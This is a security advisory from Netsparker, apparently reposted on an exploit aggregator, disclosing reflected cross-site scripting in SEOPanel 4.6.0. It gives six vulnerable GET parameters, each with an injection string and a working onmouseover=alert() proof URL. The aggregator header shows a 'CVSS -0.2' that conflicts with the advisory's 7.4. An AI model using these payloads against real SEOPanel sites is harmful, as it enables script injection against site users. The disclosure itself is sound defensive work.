Exploit for SEOPanel 4.6.0 Cross Site Scripting

Name: Exploit for SEOPanel 4.6.0 Cross Site Scripting
Rating: 5 (369 reviews)
2020-12-28 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:160728
Hello,  
  
We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel  
4.6.0.  
  
Information  
--------------------  
  
Advisory by Netsparker  
Name: Cross-Site Scripting Vulnerabilities in SEOPanel  
Affected Software: SEOPanel  
Affected Versions: 4.6.0  
Vendor Homepage: https://www.seopanel.org/  
Vulnerability Type: Cross-Site Scripting  
Severity: Important  
Status: Fixed  
CVSS Score (3.0): 7.4 (High)  
Netsparker Advisory Reference: NS-20-005  
  
Technical Details  
--------------------  
  
SEO Panel root was at http://localhost:8080  
  
Cross-site Scripting in Directories.php  
  
URL:  
http://localhost:8080/directories.php?capcheck=%27%22%20ns%3dnetsparker(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1  
Parameter Name: capcheck  
Parameter Type: GET  
Attack: '" ns=netsparker(0x00E4E5)  
Proof URL:  
http://localhost:8080/directories.php?capcheck=%27%22%20onmouseover%3dalert(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1  
  
Cross-site Scripting in seo-plugins-manager.php (5)  
  
URL:  
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x01434E)%20  
Parameter Name: stscheck  
Parameter Type: GET  
Attack: '" ns=netsparker(0x01434E)  
Proof URL:  
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x01434E)%20  
  
URL:  
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x00E492)%20  
Parameter Name: stscheck  
Parameter Type: GET  
Attack: ''" ns=netsparker(0x00E492)  
Proof URL:  
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x00E492)%20  
  
URL:  
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x011A0C)%20&pid=1&sec=listinfo  
Parameter Name: pageno  
Parameter Type: GET  
Attack: ''" ns=netsparker(0x011A0C)  
Proof URL:  
http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x011A0C)%20&pid=1&sec=listinfo  
  
URL:  
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20ns%3dnetsparker(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select  
Parameter Name: pageno  
Parameter Type: GET  
Attack: '" ns=netsparker(0x01B8AB)  
Proof URL:  
http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20onmouseover%3dalert(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select  
  
URL:  
http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x00DC5E)%20&pid=1&sec=listinfo  
Parameter Name: pageno  
Parameter Type: GET  
Attack: ''" ns=netsparker(0x00DC5E)  
Proof URL:  
http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x00DC5E)%20&pid=1&sec=listinfo  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-20-005-cross-site-scripting-in-seopanel/  
  
Regards,  
  
[image: upload image]  
Daniel Bishtawi | Marketing Administrator  
E: daniel.bishtawi@netsparker.com <daniel.bishtawi@netsparker.com>